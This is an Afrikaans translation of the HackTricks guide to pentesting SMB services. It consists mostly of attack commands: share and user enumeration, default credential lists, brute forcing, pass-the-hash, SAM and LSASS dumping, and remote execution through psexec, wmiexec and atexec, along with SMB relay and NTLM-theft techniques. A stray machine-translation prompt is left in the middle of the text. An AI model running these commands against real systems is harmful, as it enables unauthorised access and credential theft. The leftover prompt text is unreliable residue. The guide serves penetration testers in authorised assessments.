hacktricks/network-services-pentesting/pentesting-smb.md

139,445 - Pentesting SMB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

• As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
• Kry die amptelike PEASS & HackTricks swag
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
• Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.

Poort 139

Die Network Basic Input Output System (NetBIOS) is 'n sagtewareprotokol wat ontwerp is om toepassings, rekenaars en lessenaars binne 'n plaaslike area-netwerk (LAN) in staat te stel om met netwerkhardeware te interaksieer en die oordrag van data oor die netwerk te fasiliteer. Die identifikasie en ligging van sagtewaretoepassings wat op 'n NetBIOS-netwerk werk, word bereik deur middel van hul NetBIOS-name, wat tot 16 karakters lank kan wees en dikwels verskil van die rekenaarnaam. 'n NetBIOS-sessie tussen twee toepassings word geïnisieer wanneer een toepassing (as die kliënt) 'n bevel uitreik om 'n ander toepassing (as die bediener) te "roep" deur gebruik te maak van TCP-poort 139.

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

Poort 445

Tegnies gesproke word Poort 139 as 'NBT oor IP' verwys, terwyl Poort 445 geïdentifiseer word as 'SMB oor IP'. Die akroniem SMB staan vir 'Server Message Blocks', wat ook bekend is as die Common Internet File System (CIFS). As 'n toepassingslaag-netwerkprotokol word SMB/CIFS hoofsaaklik gebruik om gedeelde toegang tot lêers, drukkers, seriële poorte moontlik te maak en verskillende vorms van kommunikasie tussen knooppunte op 'n netwerk te fasiliteer.

Byvoorbeeld, in die konteks van Windows, word daar beklemtoon dat SMB direk oor TCP/IP kan werk, sonder die noodsaaklikheid van NetBIOS oor TCP/IP, deur die gebruik van poort 445. Daarenteen, op verskillende stelsels, word die gebruik van poort 139 waargeneem, wat aandui dat SMB saam met NetBIOS oor TCP/IP uitgevoer word.

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Die Server Message Block (SMB)-protokol, wat in 'n kliënt-bediener-model werk, is ontwerp om toegang tot lêers, gidslys en ander netwerkbronne soos drukkers en roeteryers te reguleer. Dit word hoofsaaklik binne die Windows-bedryfstelselreeks gebruik en SMB verseker agterwaartse verenigbaarheid, wat toestelle met nuwer weergawes van Microsoft se bedryfstelsel in staat stel om naadloos te kommunikeer met dié wat ouer weergawes gebruik. Daarbenewens bied die Samba-projek 'n gratis sagteware-oplossing wat die implementering van SMB op Linux- en Unix-stelsels moontlik maak, wat kruisplatform kommunikasie deur middel van SMB fasiliteer.

Shares, wat willekeurige dele van die plaaslike lêersisteem verteenwoordig, kan deur 'n SMB-bediener voorsien word, wat die hiërargie sienbaar maak vir 'n kliënt wat gedeeltelik onafhanklik is van die werklike struktuur van die bediener. Die Access Control Lists (ACLs), wat toegangsregte definieer, maak fynkontrole oor gebruikersregte moontlik, insluitend eienskappe soos uitvoer, lees en volle toegang. Hierdie regte kan aan individuele gebruikers of groepe toegewys word, gebaseer op die shares, en is afsonderlik van die plaaslike regte wat op die bediener ingestel is.

IPC$ Share

Toegang tot die IPC$-share kan verkry word deur 'n anonieme nul-sessie, wat interaksie met dienste wat blootgestel word deur benoemde pype moontlik maak. Die nut enum4linux is nuttig vir hierdie doel. As dit korrek gebruik word, maak dit die verkryging van die volgende moontlik:

• Inligting oor die bedryfstelsel
• Besonderhede oor die ouer domein
• 'n Samestelling van plaaslike gebruikers en groepe
• Inligting oor beskikbare SMB-shares
• Die effektiewe stelselsekuriteitsbeleid

Hierdie funksionaliteit is krities vir netwerkadministrateurs en sekuriteitsprofessionele om die sekuriteitspostuur van SMB (Server Message Block)-dienste op 'n netwerk te assesseer. enum4linux bied 'n omvattende siening van die teikensisteem se SMB-omgewing, wat noodsaaklik is om potensiële kwesbaarhede te identifiseer en te verseker dat die SMB-dienste behoorlik beveilig is.

enum4linux -a target_ip

Die bogenoemde bevel is 'n voorbeeld van hoe enum4linux gebruik kan word om 'n volledige opname teen 'n teiken wat deur target_ip gespesifiseer word, uit te voer.

Wat is NTLM

As jy nie weet wat NTLM is nie of as jy wil weet hoe dit werk en hoe om dit te misbruik, sal jy hierdie bladsy oor NTLM baie interessant vind waar dit verduidelik word hoe hierdie protokol werk en hoe jy daarvan kan profiteer:

{% content-ref url="../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}

Bedieneropname

Skandeer 'n netwerk om na gasheer te soek:

nbtscan -r 192.168.0.1/24

SMB-bedienerweergawe

Om moontlike uitbuitings vir die SMB-weergawe te soek, is dit belangrik om te weet watter weergawe gebruik word. As hierdie inligting nie in ander gebruikte gereedskap verskyn nie, kan jy:

• Die MSF hulpmodule _auxiliary/scanner/smb/smb_version gebruik
• Of hierdie skrip:

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

Soek na uitbuiting

msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

Moontlike Gelde

Gebruikersnaam(s)	Gewone wagwoorde
(leeg)	(leeg)
gas	(leeg)
Administrateur, admin	(leeg), wagwoord, administrateur, admin
arcserve	arcserve, rugsteun
tivoli, tmersrvd	tivoli, tmersrvd, admin
backupexec, rugsteun	backupexec, rugsteun, arcada
toets, laboratorium, demonstrasie	wagwoord, toets, laboratorium, demonstrasie

Brute Force

• SMB Brute Force

SMB Omgewingsinligting

Verkry Inligting

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

Enumereer Gebruikers, Groepe & Aangemelde Gebruikers

Hierdie inligting moet reeds ingesamel word deur enum4linux en enum4linux-ng.

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

Enumereer plaaslike gebruikers

Impacket

lookupsid.py -no-pass hostname.local

Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/network-services-pentesting/pentesting-smb.md. Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaksis. Moenie dinge soos kode, hakmetode name, hakwoorde, wolk/SaaS-platformname (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Voeg ook geen ekstra goed by behalwe die vertaling en markdown-sintaksis nie.

for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - Enumereer plaaslike gebruikers

Hierdie module in Metasploit word gebruik om plaaslike gebruikers op 'n teikensisteem te ondersoek. Dit kan nuttig wees vir die identifisering van potensiële aanvalsveilighede en die verkryging van toegang tot die sisteem. Die module maak gebruik van die SMB-protokol om die ondersoek uit te voer.

Gebruik

Om hierdie module te gebruik, voer die volgende opdrag in die Metasploit-konsole in:

use auxiliary/scanner/smb/smb_enumusers

Stel die vereiste parameters in, soos die IP-adres van die teikensisteem en die SMB-gebruikersnaam en -wagwoord. Gebruik die set-opdrag om die parameters in te stel.

set RHOSTS <teikensisteem_IP>
set SMBUser <gebruikersnaam>
set SMBPass <wagwoord>

Voer die module uit deur die run-opdrag te gebruik:

run

Die module sal dan begin om die plaaslike gebruikers op die teikensisteem te ondersoek en die resultate sal in die Metasploit-konsole vertoon word.

use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run

Enumerasie van LSARPC en SAMR rpcclient

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}

GUI-verbinding vanaf Linux

In die terminaal:

xdg-open smb://cascade.htb/

In die lêerblaaier-venster (nautilus, thunar, ens.)

smb://friendzone.htb/general/

Gedeelde vouers Enumerasie

Lys gedeelde vouers

Dit word altyd aanbeveel om te kyk of jy toegang het tot enige iets, as jy nie geloofsbriewe het nie, probeer nul geloofsbriewe/gasgebruiker gebruik.

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Verbind/Lys 'n gedeelde vouer

Om 'n gedeelde vouer aan te sluit of te lys, kan jy die volgende stappe volg:

1. Gebruik die smbclient-hulpmiddel om 'n verbinding met die SMB-diens te maak. Voer die volgende opdrag in die opdragreël in:

   smbclient //<IP-adres>/<gedeelde_vouernaam> -U <gebruikersnaam>
   

   Vervang <IP-adres> met die IP-adres van die doelwit-stelsel en <gedeelde_vouernaam> met die naam van die gedeelde vouer wat jy wil verbind of lys. Voeg ook die korrekte <gebruikersnaam> en wagwoord in vir die SMB-verifikasie.

2. As die verbinding suksesvol is, sal jy 'n smb: \>-opdragreël sien. Jy kan die volgende opdragte gebruik om die gedeelde vouer te ondersoek:

   • ls: Lys die inhoud van die huidige gedeelde vouer.
   • cd <vouernaam>: Verander na 'n spesifieke vouer binne die gedeelde vouer.
   • get <lêernaam>: Laai 'n spesifieke lêer van die gedeelde vouer af na jou plaaslike stelsel.
   • put <lêernaam>: Laai 'n spesifieke lêer van jou plaaslike stelsel na die gedeelde vouer.

3. As jy klaar is met die ondersoek van die gedeelde vouer, kan jy die verbinding verbreek deur die exit-opdrag in te voer by die smb: \>-opdragreël.

Dit is belangrik om te onthou dat jy die nodige toegangsregte moet hê om die gedeelde vouer te kan verbind of lys.

#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

Handmatig ondersoek van Windows-aandele en koppel daaraan

Dit is moontlik dat jy beperk is om enige aandele van die gasheer-rekenaar te vertoon en wanneer jy probeer om hulle op te lys, lyk dit asof daar geen aandele is om aan te koppel nie. Dit mag dus die moeite werd wees om 'n poging te waag om handmatig aan 'n aandeel te koppel. Om die aandele handmatig te ondersoek, wil jy dalk kyk vir reaksies soos NT_STATUS_ACCESS_DENIED en NT_STATUS_BAD_NETWORK_NAME wanneer jy 'n geldige sessie gebruik (bv. 'n nul-sessie of geldige geloofsbriewe). Dit kan aandui of die aandeel bestaan en jy nie toegang daartoe het nie, of dat die aandeel glad nie bestaan nie.

Gewone aandele name vir Windows teikens is

• C$
• D$
• ADMIN$
• IPC$
• PRINT$
• FAX$
• SYSVOL
• NETLOGON

(Gewone aandele name van Network Security Assessment 3rd edition)

Jy kan probeer om daaraan te koppel deur die volgende bevel te gebruik

smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)

of hierdie skrip (deur 'n nul-sessie te gebruik)

#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done

Voorbeelde

smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session

Enumerateer gedeeltes vanaf Windows / sonder hulpmiddels van derde partye

PowerShell

# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection

CMD-konsole

Die CMD-konsole is 'n opdraggewer-venster wat gebruik word om opdragte uit te voer en met die bedryfstelsel te kommunikeer. Dit is 'n kragtige hulpmiddel wat deur pentesters gebruik kan word om verskeie take uit te voer, soos netwerkondersoek, lêerbestuur, prosesbestuur en nog baie meer. Hier is 'n paar nuttige opdragte wat in die CMD-konsole gebruik kan word:

• ipconfig: Gee inligting oor die netwerkverbindings op die stelsel.
• ping: Stuur 'n ICMP-sonde na 'n spesifieke IP-adres om te kyk of dit bereikbaar is.
• nslookup: Voer DNS-navrae uit om DNS-inligting oor 'n spesifieke domein te verkry.
• netstat: Gee 'n lys aktiewe netwerkverbindings en poorte op die stelsel.
• tasklist: Gee 'n lys aktiewe prosesse op die stelsel.
• net user: Voer gebruikersbestuurstake uit, soos die lys van gebruikers op die stelsel en die verandering van gebruikerswagwoorde.

Dit is net 'n paar voorbeelde van die opdragte wat in die CMD-konsole gebruik kan word. Deur hierdie opdragte te gebruik, kan pentesters die netwerk en stelsel ondersoek, kwesbaarhede identifiseer en toegang tot die stelsel verkry vir verdere pentesting-aktiwiteite.

# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all

MMC Snap-in (grafies)

# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc

explorer.exe (grafies), tik \\<ip>\ in om die beskikbare nie-versteekte gedeeltes te sien.

Monteer 'n gedeelde vouer

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Laai lêers af

Lees vorige afdelings om te leer hoe om te verbind met geloofsbriewe/Pass-the-Hash.

#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap

#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Opdragte:

• masker: spesifiseer die masker wat gebruik word om die lêers binne die gids te filtreer (bv. "" vir alle lêers)
• rekursie: skakel rekursie aan (verstek: af)
• vra: skakel vrae vir lêernaam af (verstek: aan)
• mget: kopieer alle lêers wat ooreenstem met die masker vanaf die bediener na die klientrekenaar

(Inligting van die manblad van smbclient)

Soek na Gedeelde Gids van die Domein

• Snaffler****

Snaffler.exe -s -d domain.local -o snaffler.log -v data

• CrackMapExec spinnekop.
• -M spinnekop_plus [--share <share_name>]
• --patroon txt

sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'

Spesiaal interessant vanaf shares is die lêers genaamd Registry.xml aangesien hulle moontlik wagwoorde kan bevat vir gebruikers wat gekonfigureer is met autologon via Groepbeleid. Of web.config lêers aangesien hulle geloofsbriewe bevat.

{% hint style="info" %} Die SYSVOL share is leesbaar deur alle geautehtiseerde gebruikers in die domein. Daar kan jy baie verskillende batch, VBScript, en PowerShell skripte vind.
Jy moet die skripte binne-in dit ondersoek aangesien jy moontlik sensitiewe inligting soos wagwoorde kan vind. {% endhint %}

Lees Register

Jy kan dalk die register lees deur van die ontdekte geloofsbriewe gebruik te maak. Impacket reg.py stel jou in staat om dit te probeer:

sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post Exploitasie

Die standaard konfigurasie van 'n Samba-bediener is gewoonlik geleë in /etc/samba/smb.conf en mag enkele gevaarlike konfigurasies hê:

Instelling	Beskrywing
browseable = yes	Toelaat om beskikbare gedeeltes in die huidige gedeelte te lys?
read only = no	Verbied die skep en wysiging van lêers?
writable = yes	Laat gebruikers toe om lêers te skep en wysig?
guest ok = yes	Toelaat om na die diens te verbind sonder om 'n wagwoord te gebruik?
enable privileges = yes	Eer voorregte wat aan spesifieke SID toegewys is?
create mask = 0777	Watter regte moet aan die nuut geskepte lêers toegewys word?
directory mask = 0777	Watter regte moet aan die nuut geskepte gidektores toegewys word?
logon script = script.sh	Watter skrip moet uitgevoer word wanneer die gebruiker aanmeld?
magic script = script.sh	Watter skrip moet uitgevoer word wanneer die skrip gesluit word?
magic output = script.out	Waar moet die uitset van die toor skrip gestoor word?

Die opdrag smbstatus gee inligting oor die bediener en oor wie gekoppel is.

Verifieer met behulp van Kerberos

Jy kan verifieer na kerberos deur die hulpmiddels smbclient en rpcclient te gebruik:

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

Voer Opdragte Uit

crackmapexec

crackmapexec kan opdragte uitvoer deur enige van die volgende metodes te misbruik: mmcexec, smbexec, atexec, wmiexec, waarvan wmiexec die verstek metode is. Jy kan aandui watter opsie jy verkies om te gebruik met die parameter --exec-method:

apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash

psexec/smbexec

Albei opsies sal 'n nuwe diens skep (deur gebruik te maak van \pipe\svcctl via SMB) op die slagoffer se masjien en dit gebruik om iets uit te voer (psexec sal 'n uitvoerbare lêer na die ADMIN$ deel oplaai en smbexec sal verwys na cmd.exe/powershell.exe en die payload in die argumente plaas --file-less tegniek-).
Meer inligting oor psexec en smbexec.
In kali is dit geleë op /usr/share/doc/python3-impacket/examples/

#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash

Met behulp van die parameter -k kan jy teen kerberos geverifieer word in plaas van NTLM.

wmiexec/dcomexec

Voer stiekem 'n opdragvenster uit sonder om die skyf aan te raak of 'n nuwe diens te laat loop deur gebruik te maak van DCOM via poort 135.
In kali is dit geleë op /usr/share/doc/python3-impacket/examples/

#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

Deur die parameter -k te gebruik, kan jy geverifieer word teen kerberos in plaas van NTLM.

#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

AtExec

Voer opdragte uit via die Taakbeplanner (deur gebruik te maak van \pipe\atsvc via SMB).
In kali is dit geleë op /usr/share/doc/python3-impacket/examples/

./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"

Impacket verwysing

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Bruteforce gebruikerslegitimasie

Dit word nie aanbeveel nie, jy kan 'n rekening blokkeer as jy die maksimum toegelate pogings oorskry

nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name

SMB-relay aanval

Hierdie aanval maak gebruik van die Responder toolkit om SMB-outentiseringsessies op 'n interne netwerk vas te vang en dit na 'n teikermasjien te stuur. As die outentiseringsessie suksesvol is, sal dit jou outomaties in 'n stelsel-skulp laat val.
Meer inligting oor hierdie aanval hier.

SMB-Valstrik

Die Windows-biblioteek URLMon.dll probeer outomaties outentiseer na die gasheer wanneer 'n bladsy probeer om toegang tot sekere inhoud te verkry via SMB, byvoorbeeld: img src="\\10.10.10.10\path\image.jpg"

Dit gebeur met die funksies:

• URLDownloadToFile
• URLDownloadToCache
• URLOpenStream
• URLOpenBlockingStream

Wat deur sommige webblaaier en gereedskap (soos Skype) gebruik word.

SMB-Valstrik met behulp van MitMf

NTLM-diefstal

Soortgelyk aan SMB-valstrik, kan die plant van skadelike lêers op 'n teikersisteem (via SMB, byvoorbeeld) 'n SMB-outentiseringspoging uitlok, wat die NetNTLMv2-hash toelaat om onderskep te word met 'n hulpmiddel soos Responder. Die hash kan dan offline gekraak word of gebruik word in 'n SMB-relay aanval.

Sien: ntlm_theft

HackTricks Outomatiese Opdragte

Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

#These are the commands I run in order every time I see an open SMB port

With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}

Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

• As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
• Kry die amptelike PEASS & HackTricks swag
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
• Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.